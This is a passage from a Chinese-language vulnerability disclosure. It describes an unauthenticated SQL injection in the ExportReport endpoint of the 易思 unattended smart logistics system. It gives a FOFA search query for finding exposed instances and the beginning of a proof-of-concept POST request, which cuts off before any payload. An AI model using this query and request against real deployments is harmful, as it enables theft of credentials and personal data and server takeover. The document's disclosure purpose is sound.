0x01 产品简介
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。该系统旨在为流程生产企业提供原料采购、产成品销售及厂内物流的统一管控智能信息化平台,通过全企业产供销业务的集成管理,实现无人值守计量、降本增效、机器替代人工,优化物流资源管控体系。
0x02 漏洞概述
易思智能物流无人值守系统 ExportReport 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 复现环境
FOFA:body="/api/SingleLogin"
0x04 漏洞复现
PoC
POST /Sys_ReportFile/ExportReport HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Wind
